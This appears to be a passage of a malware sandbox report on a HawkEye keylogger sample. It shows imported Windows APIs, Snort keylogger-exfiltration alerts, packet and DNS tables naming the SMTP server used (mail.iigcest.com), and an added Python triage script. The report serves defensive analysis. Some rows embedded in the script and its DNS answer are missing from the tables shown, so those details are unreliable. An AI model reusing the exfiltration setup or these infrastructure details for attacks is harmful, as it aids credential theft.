                                                                      gdi32.dll: UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                      user32.dll: WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardType, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                      kernel32.dll: Sleep
                                                                      oleaut32.dll: SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                      comctl32.dll: ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                      kernel32.dll: MulDiv

                                                                      Possible Origin

                                                                      Language of compilation system  Country where language is spoken  Map
                                                                      English                         United States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
                                                                      11/18/20-15:02:26.704911  TCP       2019926  ET TROJAN HawkEye Keylogger Report SMTP  49750        587        192.168.2.4  166.62.27.57
                                                                      11/18/20-15:03:08.289546  TCP       2019926  ET TROJAN HawkEye Keylogger Report SMTP  49774        587        192.168.2.4  166.62.27.57

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                      Nov 18, 2020 15:02:25.388873100 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:25.710129023 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.858115911 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.858395100 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.139451027 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.139874935 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.422636032 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.422939062 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.703771114 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.703959942 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.704910994 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.704945087 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705151081 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705218077 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705363989 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705427885 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.986233950 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.986258984 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.999335051 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:27.002060890 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:27.057396889 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:33.383512020 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:33.383887053 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:38.505419016 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.521910906 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.522161961 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.523021936 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.539441109 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.549550056 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.597470045 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.613935947 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.614130020 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.673311949 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.689773083 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690314054 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690376043 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690885067 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.693752050 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.695373058 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.710299015 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.711641073 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.711795092 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.712759972 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.714680910 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.729115963 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729497910 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729578018 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729635954 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.731683016 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.747950077 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:03:05.906356096 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.168962955 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.169061899 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.695435047 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.695717096 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.958623886 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.959141970 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.222193003 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.223017931 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.495678902 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.495965004 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.758713007 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.758955002 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.022917032 CET58749774166.62.27.57192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2020 15:01:43.623750925 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:43.650897980 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:45.449043989 CET | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:45.475955009 CET | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:46.248142004 CET | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:46.275309086 CET | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:47.094983101 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:47.122129917 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:47.915492058 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:47.943371058 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:48.590341091 CET | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:48.617573977 CET | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:49.659903049 CET | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:49.687086105 CET | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:50.457806110 CET | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:50.495663881 CET | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:54.680612087 CET | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:54.707959890 CET | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:55.514782906 CET | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:55.541924000 CET | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:56.319547892 CET | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:56.346719980 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:57.273447990 CET | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:57.300653934 CET | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:58.292248964 CET | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:58.319410086 CET | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:58.704564095 CET | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:58.741070986 CET | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:58.971637011 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:59.006939888 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:01:59.079847097 CET | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:01:59.106956959 CET | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:02.765192986 CET | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:02.792345047 CET | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:11.437201977 CET | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:11.464301109 CET | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:22.060935974 CET | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:22.088042021 CET | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:23.770134926 CET | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:23.815956116 CET | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:32.777748108 CET | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:32.804969072 CET | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:35.306493044 CET | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:35.342278957 CET | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:35.996299028 CET | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:36.031609058 CET | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:36.529362917 CET | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:36.565490007 CET | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:36.900733948 CET | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:36.960184097 CET | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:37.449456930 CET | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:37.485517025 CET | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:37.910711050 CET | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:37.937813044 CET | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:38.128568888 CET | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:38.164376020 CET | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:38.443804026 CET | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:38.471159935 CET | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:38.472012043 CET | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:38.507505894 CET | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:38.556760073 CET | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:38.592199087 CET | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:38.655498981 CET | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:38.690794945 CET | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:39.171142101 CET | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:39.207019091 CET | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:39.929310083 CET | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:39.956566095 CET | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:41.034682989 CET | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:41.072463989 CET | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:43.444211006 CET | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:43.471467018 CET | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:02:55.619406939 CET | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:02:55.656312943 CET | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:04.388042927 CET | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:04.415371895 CET | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:05.854183912 CET | 62833 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:05.904856920 CET | 53 | 62833 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:20.956906080 CET | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:20.992511988 CET | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:21.287211895 CET | 49944 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:21.314351082 CET | 53 | 49944 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:21.386476994 CET | 63300 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:21.424304962 CET | 53 | 63300 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:24.213391066 CET | 61449 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:24.240730047 CET | 53 | 61449 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:24.378654003 CET | 51275 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:24.414350033 CET | 53 | 51275 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:26.271187067 CET | 63492 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:26.298304081 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:33.447617054 CET | 58945 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:33.483230114 CET | 53 | 58945 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:33.766551018 CET | 60779 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:33.802285910 CET | 53 | 60779 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:33.881725073 CET | 64014 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:33.917220116 CET | 53 | 64014 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:38.988058090 CET | 57091 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:39.015259027 CET | 53 | 57091 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:46.905772924 CET | 55904 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:46.933022976 CET | 53 | 55904 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:03:56.111162901 CET | 52109 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:03:56.138288021 CET | 53 | 52109 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:04:00.602796078 CET | 54450 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:04:00.638335943 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:04:00.673490047 CET | 49374 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:04:00.700529099 CET | 53 | 49374 | 8.8.8.8 | 192.168.2.4
Nov 18, 2020 15:04:00.756617069 CET | 50436 | 53 | 192.168.2.4 | 8.8.8.8
Nov 18, 2020 15:04:00.791821003 CET | 53 | 50436 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 18, 2020 15:01:58.704564095 CET | 192.168.2.4 | 8.8.8.8 | 0x7fd8 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:01:58.971637011 CET | 192.168.2.4 | 8.8.8.8 | 0x27c4 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:01:59.079847097 CET | 192.168.2.4 | 8.8.8.8 | 0x7cb6 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:23.770134926 CET | 192.168.2.4 | 8.8.8.8 | 0xb5a3 | Standard query (0) | mail.iigcest.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.128568888 CET | 192.168.2.4 | 8.8.8.8 | 0x8bd0 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:02:38.443804026 CET | 192.168.2.4 | 8.8.8.8 | 0x9673 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.556760073 CET | 192.168.2.4 | 8.8.8.8 | 0x19c | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:05.854183912 CET | 192.168.2.4 | 8.8.8.8 | 0x697a | Standard query (0) | mail.iigcest.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:20.956906080 CET | 192.168.2.4 | 8.8.8.8 | 0xa2aa | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:21.287211895 CET | 192.168.2.4 | 8.8.8.8 | 0x557a | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.386476994 CET | 192.168.2.4 | 8.8.8.8 | 0x5ae3 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.447617054 CET | 192.168.2.4 | 8.8.8.8 | 0x53b6 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:33.766551018 CET | 192.168.2.4 | 8.8.8.8 | 0x5dfb | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.881725073 CET | 192.168.2.4 | 8.8.8.8 | 0x5d23 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.602796078 CET | 192.168.2.4 | 8.8.8.8 | 0x70c7 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:04:00.673490047 CET | 192.168.2.4 | 8.8.8.8 | 0x279f | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.756617069 CET | 192.168.2.4 | 8.8.8.8 | 0x506 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
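Read together, the TCP and DNS tables in this section give the order of events that matters for triage: every connection to mail.iigcest.com on port 587 (the SMTP submission port) is preceded by lookups of whatismyipaddress.com, the external-IP check listed under the report's signatures. The Python below joins the two tables to put hostnames on the sample's destinations and to flag that sequence. It is an added example written for this page, not Joe Sandbox code; the rows it embeds are copied from this report's TCP Packets and DNS Answers tables (client-to-server packets only, one row per connection, timestamps shortened to time of day), while the watch-list of IP-check domains and the SMTP port set are the example's own assumptions.

```python
"""Join the report's TCP flows with its DNS answers and flag the
'external-IP check, then outbound SMTP' sequence.

Added example for this analysis page; not Joe Sandbox code. The data rows
are copied from the TCP Packets and DNS Answers tables on the page (one row
per client-to-server connection, timestamps shortened to time of day); the
domain watch-list and SMTP port set are assumptions made for this example.
"""
from collections import defaultdict

# One row per outbound connection, from the TCP Packets table:
# (time, src_port, dst_port, src_ip, dst_ip)
TCP_FLOWS = [
    ("15:01:59.108", 49744, 443, "192.168.2.4", "104.16.154.36"),
    ("15:01:59.117", 49743,  80, "192.168.2.4", "104.16.154.36"),
    ("15:01:59.199", 49745, 443, "192.168.2.4", "104.16.154.36"),
    ("15:02:23.817", 49750, 587, "192.168.2.4", "166.62.27.57"),
    ("15:02:38.505", 49759,  80, "192.168.2.4", "104.16.154.36"),
    ("15:02:38.597", 49761, 443, "192.168.2.4", "104.16.154.36"),
    ("15:02:38.695", 49763, 443, "192.168.2.4", "104.16.154.36"),
    ("15:03:05.906", 49774, 587, "192.168.2.4", "166.62.27.57"),
]

# A-record answers from the DNS Answers table: (name, address)
DNS_ANSWERS = [
    ("whatismyipaddress.com", "104.16.154.36"),
    ("whatismyipaddress.com", "104.16.155.36"),
    ("mail.iigcest.com", "166.62.27.57"),
]

# Assumed watch-list of public-IP lookup services and SMTP ports.
IP_CHECK_DOMAINS = {"whatismyipaddress.com"}
SMTP_PORTS = {25, 465, 587}


def address_to_names(answers):
    """Invert the DNS answers: address -> set of names that resolved to it."""
    table = defaultdict(set)
    for name, addr in answers:
        table[addr].add(name)
    return table


def name_flows(flows, answers):
    """Attach the resolved hostname(s), if any, to each outbound flow."""
    table = address_to_names(answers)
    return [
        {"time": t, "sport": sp, "dport": dp, "dst": dst,
         "names": sorted(table.get(dst, ()))}
        for t, sp, dp, _src, dst in flows
    ]


def flag_exfil_pattern(named_flows):
    """Return one finding per SMTP connection, noting whether an
    external-IP lookup service was contacted earlier in the capture.
    Each finding is (time, dst_ip, dst_port, hostname, ip_check_seen)."""
    findings = []
    ip_check_seen = False
    for f in named_flows:  # flows are already in capture order
        if IP_CHECK_DOMAINS & set(f["names"]):
            ip_check_seen = True
        elif f["dport"] in SMTP_PORTS:
            host = ", ".join(f["names"]) or f["dst"]
            findings.append((f["time"], f["dst"], f["dport"], host, ip_check_seen))
    return findings


if __name__ == "__main__":
    named = name_flows(TCP_FLOWS, DNS_ANSWERS)
    for f in named:
        print(f"{f['time']} {f['dst']}:{f['dport']:<4} {', '.join(f['names']) or '?'}")
    for time, dst, port, host, seen in flag_exfil_pattern(named):
        print(f"SMTP to {host} ({dst}:{port}) at {time}; IP check seen before: {seen}")
```

On this capture both port-587 connections resolve to mail.iigcest.com and both come after the whatismyipaddress.com traffic, which is the combination the finding reports; the hostname join is what lets an analyst pivot from the raw 166.62.27.57 flows to the mail server name without re-reading the DNS tables by hand.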

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 18, 2020 15:01:58.741070986 CET | 8.8.8.8 | 192.168.2.4 | 0x7fd8 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:01:59.006939888 CET | 8.8.8.8 | 192.168.2.4 | 0x27c4 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:01:59.006939888 CET | 8.8.8.8 | 192.168.2.4 | 0x27c4 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
